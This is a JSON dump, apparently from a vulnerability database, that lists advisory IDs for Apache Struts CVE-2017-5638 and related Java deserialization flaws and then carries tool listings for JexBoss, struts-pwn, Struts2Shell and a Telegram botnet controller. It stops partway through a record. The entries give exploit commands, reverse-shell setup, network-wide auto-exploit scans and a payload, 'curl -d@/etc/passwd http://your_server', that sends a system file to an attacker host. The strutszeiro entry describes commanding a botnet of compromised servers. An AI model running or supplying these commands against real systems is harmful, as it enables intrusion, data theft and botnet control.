"THREATPOST:1C2F8B65F8584E9BF67617A331A7B993", "THREATPOST:477B6029652B76463B5C5B7155CDF736", "THREATPOST:5ADABEB29891532ECFF2D6ABD99CAED4", "THREATPOST:5E633FD1C6A5B5BB74F1B6A8399001A2", "THREATPOST:7B2EAFA107D335014D553D78946C453E", "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "THREATPOST:A45826A8CDA7058392C4901D6AAD15F1", "THREATPOST:AACAA4F654495529E053D43901F00A81", "THREATPOST:AD5395CA5B3FD95FAD8E67B675D0AFCA", "THREATPOST:CD1CBFA154DFAA1F3DC0E2E5CFA58D0A", "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "THREATPOST:F4E175435A7C5D2A4F16D46A939B175E", "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1"]}, {"type": "tomcat", "idList": ["TOMCAT:0DBA25EA40A6FEBF5FD9039D7F60718E", "TOMCAT:604E2DE63F4E10D22151D29C4D2E7487", "TOMCAT:7FF5C8CC86A7AF5DA33F4B5874774B9B", "TOMCAT:9E43DA1677EA0537439D1A6D19A16EC5", "TOMCAT:DCB8C0E7C96DD2367CF48625F7A47EDF"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:5232F354244FCA9F40053F10BE385E28", "TRENDMICROBLOG:5DA0AA0203F450ED9FF0CB21A89017BB", "TRENDMICROBLOG:71F44A4A56FE1111907DD39C26B46152"]}, {"type": "ubuntu", "idList": ["USN-2963-1", "USN-2964-1", "USN-2972-1", "USN-3177-1", "USN-3177-2", "USN-4557-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2015-5317", "UB:CVE-2016-3427", "UB:CVE-2016-8735", "UB:CVE-2017-5638"]}, {"type": "veracode", "idList": ["VERACODE:16639", "VERACODE:16647", "VERACODE:16649", "VERACODE:16650", "VERACODE:16651", "VERACODE:16652", "VERACODE:16653", "VERACODE:16655", "VERACODE:16656", "VERACODE:16658", "VERACODE:16659", "VERACODE:16827", "VERACODE:3644", "VERACODE:3831"]}, {"type": "vmware", "idList": ["VMSA-2016-0005", "VMSA-2016-0005.5", "VMSA-2017-0004", "VMSA-2017-0004.7"]}, {"type": "zdt", "idList": ["1337DAY-ID-27300", "1337DAY-ID-27316"]}]}, "backreferences": {"references": [{"type": "amazon", "idList": ["ALAS-2016-776", "ALAS-2016-777", "ALAS-2016-778"]}, {"type": "archlinux", "idList": ["ASA-201511-11"]}, {"type": "atlassian", "idList": ["ATLASSIAN:BAM-18242", "ATLASSIAN:CWD-4879"]}, {"type": "attackerkb", "idList": ["AKB:289DC3CE-ED8A-4366-89F0-46E148584C36", "AKB:BDF59C15-D64F-45D5-B1AC-D1B9DD354080"]}, {"type": "canvas", "idList": ["STRUTS_OGNL"]}, {"type": "centos", "idList": ["CESA-2016:0650", "CESA-2016:0651", "CESA-2016:0675", "CESA-2016:0676", "CESA-2016:0723"]}, {"type": "cert", "idList": ["VU:834067"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2016-0968", "CPAI-2017-0197", "CPAI-2017-0676"]}, {"type": "cisco", "idList": ["CISCO-SA-20170310-STRUTS2"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:C2B8B89ADB85BB41095EAA7D88C0E350"]}, {"type": "cve", "idList": ["CVE-2015-5317", "CVE-2016-3427", "CVE-2017-5638"]}, {"type": "debian", "idList": ["DEBIAN:DSA-3738-1:66970", "DEBIAN:DSA-3739-1:06429"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2016-3427"]}, {"type": "f5", "idList": ["F5:K43451236", "SOL49820145", "SOL73112451"]}, {"type": "fedora", "idList": ["FEDORA:125286087B00", "FEDORA:1DA54604D2A3", "FEDORA:8CEB2616D980"]}, {"type": "freebsd", "idList": ["0B9AF110-D529-11E6-AE1B-002590263BF5"]}, {"type": "gentoo", "idList": ["GLSA-201606-18"]}, {"type": "github", "idList": ["GHSA-J77Q-2QQG-6989"]}, {"type": "githubexploit", "idList": ["B41082A1-4177-53E2-A74C-8ABA13AA3E86"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170316-01-STRUTS2"]}, {"type": "ibm", "idList": ["1BFF63EB8AF39056E08427B06D34E43B32E43FBCC74FB2A85F32E708984FD60F", "8B5016D64A8BBF10B52DDF15458908578A8F9418D5076DA06FD0081F472F9FAA"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:C40BB28F51D206C8BB23721D1ECED353", "IMPERVABLOG:DA39045C8E700086C560AAFFDBA589A6"]}, {"type": "kitploit", "idList": ["KITPLOIT:1841841790447853746", "KITPLOIT:2304674796555328667", "KITPLOIT:5052987141331551837", "KITPLOIT:7314019160937441300", "KITPLOIT:9079806502812490909"]}, {"type": "krebs", "idList": ["KREBS:EE70929DE902D9B233E209B73C1AD4A0"]}, {"type": "lenovo", "idList": ["LENOVO:PS500093-NOSID"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:4993027161793E66024E0B42522BB53D"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/STRUTS2_CONTENT_TYPE_OGNL"]}, {"type": "myhack58", "idList": ["MYHACK58:62201784024", "MYHACK58:62201784026", "MYHACK58:62201784086", "MYHACK58:62201784379"]}, {"type": "nessus", "idList": ["AIX_JAVA_APRIL2016_ADVISORY.NASL", "ALA_ALAS-2016-688.NASL", "ALA_ALAS-2016-693.NASL", "ALA_ALAS-2016-700.NASL", "ALA_ALAS-2016-776.NASL", "ALA_ALAS-2016-777.NASL", "ALA_ALAS-2016-778.NASL", "CENTOS_RHSA-2016-0650.NASL", "CENTOS_RHSA-2016-0651.NASL", "CENTOS_RHSA-2016-0675.NASL", "CENTOS_RHSA-2016-0676.NASL", "CENTOS_RHSA-2016-0723.NASL", "DEBIAN_DSA-3738.NASL", "DEBIAN_DSA-3739.NASL", "FEDORA_2016-98CCA07999.NASL", "FEDORA_2016-9C33466FBB.NASL", "FEDORA_2016-A98C560116.NASL", "FREEBSD_PKG_0B9AF110D52911E6AE1B002590263BF5.NASL", "OPENSUSE-2016-553.NASL", "OPENSUSE-2016-554.NASL", "OPENSUSE-2016-560.NASL", "OPENSUSE-2016-572.NASL", "OPENSUSE-2016-573.NASL", "ORACLELINUX_ELSA-2016-0650.NASL", "ORACLELINUX_ELSA-2016-0651.NASL", "ORACLELINUX_ELSA-2016-0675.NASL", "ORACLELINUX_ELSA-2016-0676.NASL", "ORACLELINUX_ELSA-2016-0723.NASL", "ORACLE_JROCKIT_CPU_APR_2016.NASL", "REDHAT-RHSA-2016-0650.NASL", "REDHAT-RHSA-2016-0651.NASL", "REDHAT-RHSA-2016-0675.NASL", "REDHAT-RHSA-2016-0676.NASL", "REDHAT-RHSA-2016-0677.NASL", "REDHAT-RHSA-2016-0678.NASL", "REDHAT-RHSA-2016-0679.NASL", "REDHAT-RHSA-2016-0701.NASL", "REDHAT-RHSA-2016-0702.NASL", "REDHAT-RHSA-2016-0708.NASL", "REDHAT-RHSA-2016-0716.NASL", "REDHAT-RHSA-2016-0723.NASL", "REDHAT-RHSA-2016-1039.NASL", "SL_20160420_JAVA_1_8_0_OPENJDK_ON_SL6_X.NASL", "SL_20160420_JAVA_1_8_0_OPENJDK_ON_SL7_X.NASL", "SL_20160421_JAVA_1_7_0_OPENJDK_ON_SL5_X.NASL", "SL_20160421_JAVA_1_7_0_OPENJDK_ON_SL6_X.NASL", "SL_20160509_JAVA_1_6_0_OPENJDK_ON_SL5_X.NASL", "STRUTS_2_5_10_1_WIN_LOCAL.NASL", "SUSE_SU-2016-1248-1.NASL", "SUSE_SU-2016-1250-1.NASL", "UBUNTU_USN-2963-1.NASL", "UBUNTU_USN-2964-1.NASL", "UBUNTU_USN-2972-1.NASL", "VMWARE_VCENTER_VMSA-2016-0005.NASL", "VMWARE_VCLOUD_DIRECTOR_VMSA-2016-0005.NASL", "VMWARE_VREALIZE_OPERATIONS_MANAGER_VMSA_2016_0005.NASL", "VMWARE_VSPHERE_REPLICATION_VMSA_2016_0005.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310106640", "OPENVAS:1361412562310106646", "OPENVAS:1361412562310106647", "OPENVAS:1361412562310106652", "OPENVAS:1361412562310106653", "OPENVAS:1361412562310106736", "OPENVAS:1361412562310140190", "OPENVAS:1361412562310140229", "OPENVAS:1361412562310872149", "OPENVAS:1361412562310872150", "OPENVAS:1361412562310872157", "OPENVAS:703738", "OPENVAS:703739"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2018"]}, {"type": "oraclelinux", "idList": ["ELSA-2016-0650", "ELSA-2016-0651", "ELSA-2016-0675", "ELSA-2016-0676", "ELSA-2016-0723"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:141576", "PACKETSTORM:141630"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:110CC96D8440CC2A1EA0521D300634ED"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:078B46BBA3057CDE37845D48479CC3DD"]}, {"type": "redhat", "idList": ["RHSA-2016:0678"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-5638"]}, {"type": "saint", "idList": ["SAINT:01D1CBFEFCD799FC1DCF4DD30F44F248", "SAINT:966010900F7632E797C552D31C2BB53A"]}, {"type": "seebug", "idList": ["SSV:92746", "SSV:92804"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2016:1222-1", "OPENSUSE-SU-2016:1230-1", "OPENSUSE-SU-2016:1235-1", "OPENSUSE-SU-2016:1262-1", "OPENSUSE-SU-2016:1265-1", "SUSE-SU-2016:1248-1", "SUSE-SU-2016:1250-1", "SUSE-SU-2016:1458-1", "SUSE-SU-2016:1475-1"]}, {"type": "talosblog", "idList": ["TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB"]}, {"type": "thn", "idList": ["THN:2707247140A4F620671B33D68FEB1EA9", "THN:3F47D7B66C8A65AB31FAC5823C96C34D", "THN:6C0E5E35ABB362C8EA341381B3DD76D6", "THN:ACD3479531482E2CA5A8E15EB6B47523"]}, {"type": "threatpost", "idList": ["THREATPOST:0308A7143D92E14583CCD684912ABD67", "THREATPOST:477B6029652B76463B5C5B7155CDF736", "THREATPOST:5E633FD1C6A5B5BB74F1B6A8399001A2", "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:9E84C27A33C751DE6ECC9BAAF9C0F19B", "THREATPOST:AD5395CA5B3FD95FAD8E67B675D0AFCA", "THREATPOST:CD1CBFA154DFAA1F3DC0E2E5CFA58D0A", "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1"]}, {"type": "tomcat", "idList": ["TOMCAT:7FF5C8CC86A7AF5DA33F4B5874774B9B"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:5232F354244FCA9F40053F10BE385E28", "TRENDMICROBLOG:5DA0AA0203F450ED9FF0CB21A89017BB"]}, {"type": "ubuntu", "idList": ["USN-2972-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2015-5317"]}, {"type": "vmware", "idList": ["VMSA-2017-0004.7"]}, {"type": "zdt", "idList": ["1337DAY-ID-27300", "1337DAY-ID-27316"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2015-5317", "epss": "0.003130000", "percentile": "0.654580000", "modified": "2023-03-14"}, {"cve": "CVE-2016-3427", "epss": "0.046410000", "percentile": "0.913090000", "modified": "2023-03-14"}, {"cve": "CVE-2016-8735", "epss": "0.041200000", "percentile": "0.908160000", "modified": "2023-03-14"}, {"cve": "CVE-2017-5638", "epss": "0.975380000", "percentile": "0.999830000", "modified": "2023-03-14"}], "vulnersScore": 0.4}, "_state": {"dependencies": 1700858913, "score": 1700859493, "epss": 0}, "_internal": {"score_hash": "8bc7db072d909a0803d9f8dc8eeab676"}}

{"kitploit": [{"lastseen": "2023-12-05T20:50:52", "description": "JexBoss is a tool for testing and exploiting [vulnerabilities](<https://www.kitploit.com/search/label/vulnerabilities>) in JBoss Application Server and others Java Platforms, Frameworks, Applications, etc. \n \n**Requirements** \n\n\n * Python &gt;= 2.7.x\n * [urllib3](<https://pypi.python.org/pypi/urllib3>)\n * [ipaddress](<https://pypi.python.org/pypi/ipaddress>)\n \n**Installation on Linux\\Mac** \nTo install the latest version of JexBoss, please use the following commands: \n\n \n \n git clone https://github.com/joaomatosf/jexboss.git\n cd jexboss\n pip install -r requires.txt\n python jexboss.py -h\n python jexboss.py -host http://target_host:8080\n \n OR:\n \n Download the latest version at: https://github.com/joaomatosf/jexboss/archive/master.zip\n unzip master.zip\n cd jexboss-master\n pip install -r requires.txt\n python jexboss.py -h\n python jexboss.py -host http://target_host:8080\n\nIf you are using CentOS with Python 2.6, please install Python2.7. Installation example of the Python 2.7 on CentOS using Collections Software scl: \n\n \n \n yum -y install centos-release-scl\n yum -y install python27\n scl enable python27 bash\n\n \n**Installation on Windows** \nIf you are using Windows, you can use the [Git Bash](<https://github.com/git-for-windows/git/releases/tag/v2.10.1.windows.1>) to run the JexBoss. Follow the steps below: \n\n\n * Download and install [Python](<https://www.python.org/downloads/release/python-2712/>)\n * Download and install [Git for Windows](<https://github.com/git-for-windows/git/releases/tag/v2.10.1.windows.1>)\n * After installing, run the Git for Windows and type the following commands:\n \n \n PATH=$PATH:C:\\Python27\\\n PATH=$PATH:C:\\Python27\\Scripts\n git clone https://github.com/joaomatosf/jexboss.git\n cd jexboss\n pip install -r requires.txt\n python jexboss.py -h\n python jexboss.py -host http://target_host:8080\n \n\n \n**Features** \nThe tool and [exploits](<https://www.kitploit.com/search/label/Exploits>) were developed and tested for: \n\n\n * JBoss Application Server versions: 3, 4, 5 and 6.\n * Java Deserialization Vulnerabilities in multiple java frameworks, platforms and applications (e.g., Java Server Faces - JSF, Seam Framework, RMI over HTTP, Jenkins CLI RCE (CVE-2015-5317), Remote JMX (CVE-2016-3427, CVE-2016-8735), etc)\nThe exploitation vectors are: \n\n\n * /admin-console\n * tested and working in JBoss versions 5 and 6\n * /jmx-console\n * tested and working in JBoss versions 4, 5 and 6\n * /web-console/Invoker\n * tested and working in JBoss versions 4, 5 and 6\n * /invoker/JMXInvokerServlet\n * tested and working in JBoss versions 4, 5 and 6\n * Application Deserialization\n * tested and working against multiple java applications, platforms, etc, via HTTP POST Parameters\n * Servlet Deserialization\n * tested and working against multiple java applications, platforms, etc, via servlets that process serialized objets (e.g. when you see an \"Invoker\" in a link)\n * Apache Struts2 CVE-2017-5638\n * tested in [Apache Struts](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 applications\n * Others\n \n**Videos** \n\n\n * Exploiting Java Deserialization Vulnerabilities (RCE) on JSF/Seam Applications via javax.faces.ViewState with JexBoss\n\n \n\n\n * Exploiting JBoss Application Server with JexBoss\n\n \n\n\n * Exploiting Apache Struts2 (RCE) with Jexboss (CVE-2017-5638)\n\n \n \n**Screenshots** \n\n\n * Simple usage examples:\n \n \n $ python jexboss.py\n\n \n\n\n[](<https://2.bp.blogspot.com/-alewUh8TXc0/Wi9wFJdgWpI/AAAAAAAAJo4/87dRBMNedWgmHohXnwzK2I0FJgcN0zBpwCLcBGAs/s1600/jexboss_4_simple_usage_help.png>)\n\n \n\n\n * Example of standalone mode against JBoss:\n \n \n $ python jexboss.py -u http://192.168.0.26:8080\n\n \n\n\n[](<https://3.bp.blogspot.com/-fvaYj-MWERY/Wi9wOYLDowI/AAAAAAAAJpA/5tecs4RFkyouaO4sQ20qq5gIgeHoc_VrgCLcBGAs/s1600/jexboss_5_standalone_mode1.png>)\n\n \n\n\n[](<https://4.bp.blogspot.com/-ERfHzmOvIpE/Wi9wOQNN7EI/AAAAAAAAJo8/sng_9BGOMLo7wSDXuCz-7XyIKxkgkl6VwCLcBGAs/s1600/jexboss_6_standalone_mode2.png>)\n\n * Usage modes:\n \n \n $ python jexboss.py -h\n\n * Network scan mode:\n \n \n $ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080 -results results.txt\n\n \n\n\n[](<https://4.bp.blogspot.com/-Hlq5rVHgHfI/Wi9wU1Z_sdI/AAAAAAAAJpE/Ep3uvTm2nM4A_doi2mJttKnPP3aqxM56gCLcBGAs/s1600/jexboss_7_network_scan_mode.png>)\n\n \n\n\n * Network scan with auto-exploit mode:\n \n \n $ python jexboss.py -mode auto-scan -A -network 192.168.0.0/24 -ports 8080 -results results.txt\n\n \n\n\n[](<https://1.bp.blogspot.com/-OFuKod1ko5Q/Wi9wb07NaYI/AAAAAAAAJpI/DR6ESX-6VikK_zs7vDilROlUvaLzEykrACLcBGAs/s1600/jexboss_8_scan_with_auto_exploit_mode.png>)\n\n \n\n\n * Results and recommendations:\n\n[](<https://3.bp.blogspot.com/-a6A8GBdXzWw/Wi9wgd_s8gI/AAAAAAAAJpM/XarXTIL4-wUMpFJwIr-Q9wOYkil5w76vQCLcBGAs/s1600/jexboss_9_results_and_recommendations2.png>)\n\n \n \n**Reverse Shell (meterpreter integration)** \nAfter you exploit a JBoss server, you can use the own [jexboss](<https://www.kitploit.com/search/label/JexBoss>) command shell or perform a reverse connection using the following command: \n\n \n \n jexremote=YOUR_IP:YOUR_PORT\n \n Example:\n Shell>jexremote=192.168.0.10:4444\n\n * Example: [](<https://github.com/joaomatosf/jexboss/raw/master/screenshots/jexbossreverse2.jpg>)\n\n[](<https://4.bp.blogspot.com/-DTLzz6fknAc/Wi9wlav0sMI/AAAAAAAAJpQ/Au8e57VCaooIR0iX0fH3qqPHYZvsrDHoQCLcBGAs/s1600/jexboss_10_jexbossreverse2.jpeg>)\n\n \n\n\nWhen exploiting java deserialization [vulnerabilities](<https://www.kitploit.com/search/label/vulnerabilities>) (Application Deserialization, Servlet Deserialization), the default options are: make a reverse shell connection or send a commando to execute. \n \n**Usage examples** \n\n\n * For Java Deserialization Vulnerabilities in a custom HTTP parameter and to send a custom command to be executed on the exploited server:\n \n \n $ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name --cmd 'curl -d@/etc/passwd http://your_server'\n\n * For Java Deserialization Vulnerabilities in a custom HTTP parameter and to make a reverse shell (this will ask for an IP address and port of your remote host):\n \n \n $ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name\n\n * For Java Deserialization Vulnerabilities in a Servlet (like Invoker):\n \n \n $ python jexboss.py -u http://vulnerable_java_app/path --servlet-unserialize\n\n * For [Apache Struts](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 (CVE-2017-5638)\n \n \n $ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2\n\n * For [Apache Struts](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 (CVE-2017-5638) with [cookies](<https://www.kitploit.com/search/label/Cookies>) for authenticated resources\n \n \n $ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2 --cookies \"JSESSIONID=24517D9075136F202DCE20E9C89D424D\"\n\n * Auto scan mode:\n \n \n $ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080,80 -results report_auto_scan.log\n\n * File scan mode:\n \n \n $ python jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log\n\n * More Options:\n \n \n optional arguments:\n -h, --help show this help message and exit\n --version show program's version number and exit\n --auto-exploit, -A Send exploit code automatically (USE ONLY IF YOU HAVE\n PERMISSION!!!)\n --disable-check-updates, -D\n Disable two updates checks: 1) Check for updates\n performed by the webshell in exploited server at\n http://webshell.jexboss.net/jsp_version.txt and 2)\n check for updates performed by the jexboss client at\n http://joaomatosf.com/rnp/releases.txt\n -mode {standalone,auto-scan,file-scan}\n Operation mode (DEFAULT: standalone)\n --app-unserialize, -j\n Check for java unserialization vulnerabilities in HTTP\n parameters (eg. javax.faces.ViewState, oldFormData,\n etc)\n --servlet-unserialize, -l\n Check for java unserialization vulnerabilities in\n Servlets (like Invoker interfaces)\n --jboss Check only for JBOSS vectors.\n --jenkins Check only for Jenkins CLI vector.\n --jmxtomcat Check JMX JmxRemoteLifecycleListener in Tomcat\n (CVE-2016-8735 and CVE-2016-8735). OBS: Will not be\n checked by default.\n --proxy PROXY, -P PROXY\n Use a http proxy to connect to the target URL (eg. -P\n http://192.168.0.1:3128)\n --proxy-cred LOGIN:PASS, -L LOGIN:PASS\n Proxy authentication credentials (eg -L name:password)\n --jboss-login LOGIN:PASS, -J LOGIN:PASS\n JBoss login and password for exploit admin-console in\n JBoss 5 and JBoss 6 (default: admin:admin)\n --timeout TIMEOUT Seconds to wait before timeout connection (default 3)\n \n Standalone mode:\n -host HOST, -u HOST Host address to be checked (eg. -u\n http://192.168.0.10:8080)\n \n Advanced Options (USE WHEN EXPLOITING JAVA UNSERIALIZE IN APP LAYER):\n --reverse-host RHOST:RPORT, -r RHOST:RPORT\n Remote host address and port for reverse shell when\n exploiting Java Deserialization Vulnerabilities in\n application layer (for now, working only against *nix\n systems)(eg. 192.168.0.10:1331)\n --cmd CMD, -x CMD Send specific command to run on target (eg. curl -d\n @/etc/passwd http://your_server)\n --windows, -w Specifies that the commands are for rWINDOWS System$\n (cmd.exe)\n --post-parameter PARAMETER, -H PARAMETER\n Specify the parameter to find and inject serialized\n objects into it. (egs. -H javax.faces.ViewState or -H\n oldFormData (<- Hi PayPal =X) or others) (DEFAULT:\n javax.faces.ViewState)\n --show-payload, -t Print the generated payload.\n --gadget {commons-collections3.1,commons-collections4.0,groovy1}\n Specify the type of Gadget to generate the payload\n automatically. (DEFAULT: commons-collections3.1 or\n groovy1 for JenKins)\n --load-gadget FILENAME\n Provide your own gadget from file (a java serialized\n object in RAW mode)\n --force, -F Force send java serialized gadgets to URL informed in\n -u parameter. This will send the payload in multiple\n formats (eg. RAW, GZIPED and BASE64) and with\n different Content-Types.\n \n Auto scan mode:\n -network NETWORK Network to be checked in CIDR format (eg. 10.0.0.0/8)\n -ports PORTS List of ports separated by commas to be checked for\n each host (eg. 8080,8443,8888,80,443)\n -results FILENAME File name to store the auto scan results\n \n File scan mode:\n -file FILENAME_HOSTS Filename with host list to be scanned (one host per\n line)\n -out FILENAME_RESULTS\n File name to store the file scan results\n \n\n \n \n\n\n**[Download JexBoss](<https://github.com/joaomatosf/jexboss>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-12-18T21:12:00", "type": "kitploit", "title": "JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5317", "CVE-2016-3427", "CVE-2016-8735", "CVE-2017-5638"], "modified": "2017-12-18T21:14:35", "id": "KITPLOIT:5230099254245458698", "href": "http://www.kitploit.com/2017/12/jexboss-jboss-and-others-java.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-03T16:51:32", "description": "[](<https://2.bp.blogspot.com/-11EAxL668ng/WMfWw388UFI/AAAAAAAAHa8/FeOT6wUDm_s_Ro41Cs6Ttq7cMXH5BPATQCLcB/s1600/struts-pwn.png>)\n\n \n** An exploit for Apache Struts CVE-2017-5638** \n \n** ** Usage ** ** \n \n** Testing a single URL. ** \n\n \n \n python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id'\n\n \n** Testing a list of URLs. ** \n\n \n \n python struts-pwn.py --list 'urls.txt' -c 'id'\n\n \n** Checking if the vulnerability exists against a single URL. ** \n\n \n \n python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action'\n\n \n** Checking if the vulnerability exists against a list of URLs. ** \n\n \n \n python struts-pwn.py --check --list 'urls.txt'\n\n \n** ** Requirements ** ** \n\n\n * Python2 or Python3 \n * requests \n \n** ** Legal Disclaimer ** ** \nThis project is made for educational and ethical testing purposes only. Usage of struts-pwn for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. \n \n** ** Author ** ** \n_ Mazin Ahmed _ \n\n\n * Website: [ https://mazinahmed.net ](<https://mazinahmed.net/>)\n * Email: _ mazin AT mazinahmed DOT net _\n * Twitter: [ https://twitter.com/mazen160 ](<https://twitter.com/mazen160>)\n * Linkedin: [ http://linkedin.com/in/infosecmazinahmed](<http://linkedin.com/in/infosecmazinahmed>)\n \n\n\n** [ Download struts-pwn ](<https://github.com/mazen160/struts-pwn>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-14T13:34:00", "type": "kitploit", "title": "struts-pwn - An exploit for Apache Struts CVE-2017-5638", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-14T13:34:05", "id": "KITPLOIT:1841841790447853746", "href": "http://www.kitploit.com/2017/03/struts-pwn-exploit-for-apache-struts.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-11T00:37:47", "description": "[](<https://4.bp.blogspot.com/-ueegtNhcGOM/WMtkR8p9hRI/AAAAAAAAHbo/eHq-bF-Q2GgzOPgzXd9XIaTs4L-JlNr7wCLcB/s1600/Struts2Shell.png>)\n\n \nImproves manipulation and sending commands to the vulnerable Apache Struts server using a shell. \n \n**Usage:** \n\n \n \n python Struts2Shell.py\n\n \n\n\n** [ Download Struts2Shell ](<https://github.com/s1kr10s/Struts2Shell>) **\n", "cvss3": {}, "published": "2017-03-17T14:22:00", "type": "kitploit", "title": "Struts2Shell - Interactive Shell Command to Exploit Apache Struts CVE-2017-5638", "bulletinFamily": "tools", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-17T14:22:01", "id": "KITPLOIT:2304674796555328667", "href": "http://www.kitploit.com/2017/03/struts2shell-interactive-shell-command.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-03T16:51:32", "description": "[](<https://2.bp.blogspot.com/-XZN2TA7nQZ0/WGSL3ia76KI/AAAAAAAAGuE/8pxmxtrizn8Yu1Y6iIArXYBgsL3Rhww3ACLcB/s1600/telegram-bot.png>)\n\n \nTelegram Bot to manage botnets created with struts vulnerability(CVE-2017-5638) \n \n** Dependencies ** \n\n \n \n pip install -r requeriments.txt \n\n \n** Config ** \n\n \n \n Create a telegram bot, save the API token in config/token.conf\n Create a telegram group, save the group id in config/group.conf\n\n \n** Start ** \npython strutszeiro.py \n \n** Telegram Usage ** \n\n \n \n /add url - test vulnerability and add the new server\n /exploit url *cmd - execute commands in a specific server (you need to use the * caracter)\n /botnet cmd - execute commands in all servers\n /list - show all servers in botnet\n /total - show total of servers in botnet\n\nThanks to [ @btamburi ](<https://twitter.com/BrenoTamburi>) \n \n \n\n\n** [ Download strutszeiro ](<https://github.com/mthbernardes/strutszeiro>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-14T17:30:00", "type": "kitploit", "title": "strutszeiro - Telegram Bot to manage botnets created with struts vulnerability (CVE-2017-5638)", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", 